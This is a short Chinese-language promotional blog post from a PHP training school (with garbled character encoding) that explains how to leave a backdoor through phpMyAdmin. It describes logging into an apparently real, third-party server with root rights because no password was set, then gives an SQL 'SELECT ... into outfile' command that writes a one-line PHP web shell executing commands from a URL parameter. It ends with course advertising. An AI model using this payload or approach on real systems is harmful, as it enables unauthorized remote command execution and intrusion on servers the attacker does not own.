2018-11-28 14:26:38 1468瀏覽
今天扣丁學(xué)堂PHP培訓(xùn)老師給大家分享一篇關(guān)于phpMyAdmin通過密碼漏洞留后門文件的詳細(xì)介紹,希望對同學(xué)們有所幫助,請同學(xué)們謹(jǐn)慎留后門哦!先看看有沒有不需要密碼登陸的,逐一嘗試沒有后尋找名字中包含的版本號。這里我找到一個國內(nèi)的(浙江省·杭州市)。
http://121.***.*.219:80/
登陸成功(root權(quán)限)。
SELECT "<?php system($_GET[‘cmd']); ?>" into outfile "后門文件的絕對路徑"
以上就是扣丁學(xué)堂PHP培訓(xùn)之phpMyAdmin通過密碼漏洞留后門文件的全部內(nèi)容了,希望本文的內(nèi)容對大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價值,扣丁學(xué)堂有專業(yè)老師制定的PHP學(xué)習(xí)路線圖輔助學(xué)員學(xué)習(xí),此外還有與時俱進的PHP課程體系和PHP視頻直播課供大家學(xué)習(xí),想要學(xué)好PHP開發(fā)技術(shù)的小伙伴快快行動吧??鄱W(xué)堂PHP技術(shù)交流群:374332265。
【關(guān)注微信公眾號獲取更多學(xué)習(xí)資料】
查看更多關(guān)于“php培訓(xùn)資訊”的相關(guān)文章>>